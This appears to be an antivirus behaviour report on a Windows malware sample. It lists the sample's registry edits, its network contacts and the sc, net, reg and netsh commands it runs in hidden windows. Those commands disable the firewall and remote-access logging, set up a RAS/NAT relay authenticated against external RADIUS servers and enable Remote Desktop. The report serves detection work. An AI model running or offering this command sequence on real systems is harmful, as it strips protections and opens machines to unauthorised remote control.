Technical Information
To ensure autorun and distribution
Sets the following service settings
- [HKLM\System\CurrentControlSet\Services\TapiSrv] 'Start' = '00000002'
- [HKLM\System\CurrentControlSet\Services\Netman] 'Start' = '00000002'
- [HKLM\System\CurrentControlSet\Services\RasMan] 'Start' = '00000002'
- [HKLM\System\CurrentControlSet\Services\RemoteAccess] 'Start' = '00000002'
Modifies file system
Creates the following files
- <SYSTEM32>\logfiles\in2311.log
Network activity
Connects to
- 'ne#.cn':80
TCP
HTTP GET requests
- http://www.ne#.cn/static/customercare/yourIP.asp
UDP
- DNS ASK ne#.cn
- DNS ASK FZ##.##236.226001.COM
- 'localhost':55413
- 'localhost':55414
Miscellaneous
Creates and executes the following
- '%WINDIR%\syswow64\sc.exe' stop sharedaccess' (with hidden window)
- '%WINDIR%\syswow64\net1.exe' stop remoteaccess' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RemoteAccess\Parameters /v "LoggingFlags" /t REG_DWORD /d 0 /f' (with hidden window)
- '%WINDIR%\syswow64\netsh.exe' routing ip nat add interface' (with hidden window)
- '%WINDIR%\syswow64\netsh.exe' routing ip nat install' (with hidden window)
- '%WINDIR%\syswow64\netsh.exe' ras ip set addrassign pool' (with hidden window)
- '%WINDIR%\syswow64\netsh.exe' ras ip add range 172.16.11.1 172.16.11.101' (with hidden window)
- '%WINDIR%\syswow64\netsh.exe' ras aaaa add acctserver name=vpn2.bjvpn.com secret=22883389' (with hidden window)
- '%WINDIR%\syswow64\netsh.exe' ras aaaa add authserver name=vpn2.bjvpn.com secret=22883389' (with hidden window)
- '%WINDIR%\syswow64\netsh.exe' ras aaaa add acctserver name=vpn1.bjvpn.com secret=22883389' (with hidden window)
- '%WINDIR%\syswow64\netsh.exe' ras aaaa add authserver name=vpn1.bjvpn.com secret=22883389' (with hidden window)
- '%WINDIR%\syswow64\netsh.exe' ras aaaa set accounting RADIUS' (with hidden window)
- '%WINDIR%\syswow64\netsh.exe' ras aaaa set authentication RADIUS' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' start RemoteAccessLocal Area Connection full' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' start Netman' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' start RasMan' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' start TapiSrv' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' config RemoteAccess start= AUTO' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' config RasMan start= AUTO' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' config Netman start= AUTO' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' config TapiSrv start= AUTO' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' config sharedaccess start= disabled' (with hidden window)
- '%WINDIR%\syswow64\net1.exe' start remoteaccess' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' 'HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server' /v fDenyTSConnections /t REG_DWORD /d 00000000 /f >nul' (with hidden window)
Executes the following
- '%WINDIR%\syswow64\sc.exe' stop sharedaccess
- '%WINDIR%\syswow64\net1.exe' stop remoteaccess
- '%WINDIR%\syswow64\reg.exe' add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RemoteAccess\Parameters /v "LoggingFlags" /t REG_DWORD /d 0 /f
- '%WINDIR%\syswow64\netsh.exe' routing ip nat add interface
- '%WINDIR%\syswow64\netsh.exe' routing ip nat install
- '%WINDIR%\syswow64\netsh.exe' ras ip set addrassign pool
- '%WINDIR%\syswow64\netsh.exe' ras ip add range 172.16.11.1 172.16.11.101
- '%WINDIR%\syswow64\netsh.exe' ras aaaa add acctserver name=vpn2.bjvpn.com secret=22883389
- '%WINDIR%\syswow64\netsh.exe' ras aaaa add authserver name=vpn2.bjvpn.com secret=22883389
- '%WINDIR%\syswow64\netsh.exe' ras aaaa add acctserver name=vpn1.bjvpn.com secret=22883389
- '%WINDIR%\syswow64\netsh.exe' ras aaaa add authserver name=vpn1.bjvpn.com secret=22883389
- '%WINDIR%\syswow64\netsh.exe' ras aaaa set accounting RADIUS
- '%WINDIR%\syswow64\netsh.exe' ras aaaa set authentication RADIUS
- '%WINDIR%\syswow64\sc.exe' start RemoteAccessLocal Area Connection full
- '%WINDIR%\syswow64\sc.exe' start Netman
- '%WINDIR%\syswow64\sc.exe' start RasMan
- '%WINDIR%\syswow64\sc.exe' start TapiSrv
- '%WINDIR%\syswow64\sc.exe' config RemoteAccess start= AUTO
- '%WINDIR%\syswow64\sc.exe' config RasMan start= AUTO
- '%WINDIR%\syswow64\sc.exe' config Netman start= AUTO
- '%WINDIR%\syswow64\sc.exe' config TapiSrv start= AUTO
- '%WINDIR%\syswow64\sc.exe' config sharedaccess start= disabled
- '%WINDIR%\syswow64\net1.exe' start remoteaccess
- '%WINDIR%\syswow64\reg.exe' 'HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server' /v fDenyTSConnections /t REG_DWORD /d 00000000 /f >nul
